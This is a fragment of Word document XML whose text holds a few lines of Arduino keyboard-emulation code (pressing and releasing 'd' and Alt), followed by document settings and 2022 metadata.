    </w:p>
    <w:p w14:paraId="5B1EB932" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Keyboard.press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B391F3" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A73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37F2E880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(KEY_LEFT_ALT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCE4C70" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Keyboard.release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364CB0F5" w14:textId="11577201" w:rsidR="00F44D11" w:rsidRPr="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F44D11" w:rsidRPr="002A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ED"/>
    <w:rsid w:val="00250626"/>
    <w:rsid w:val="002A736A"/>
    <w:rsid w:val="003979EE"/>
    <w:rsid w:val="00400A44"/>
    <w:rsid w:val="004D3E85"/>
    <w:rsid w:val="00576F50"/>
    <w:rsid w:val="0065577A"/>
    <w:rsid w:val="00B630A5"/>
    <w:rsid w:val="00C729ED"/>
    <w:rsid w:val="00E44994"/>
    <w:rsid w:val="00F02068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A344"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BEBA6347-C5B0-49E0-8B47-3B315FE1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11</cp:revision>
  <cp:lastPrinted>2022-05-09T18:28:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-09T16:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-09T20:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>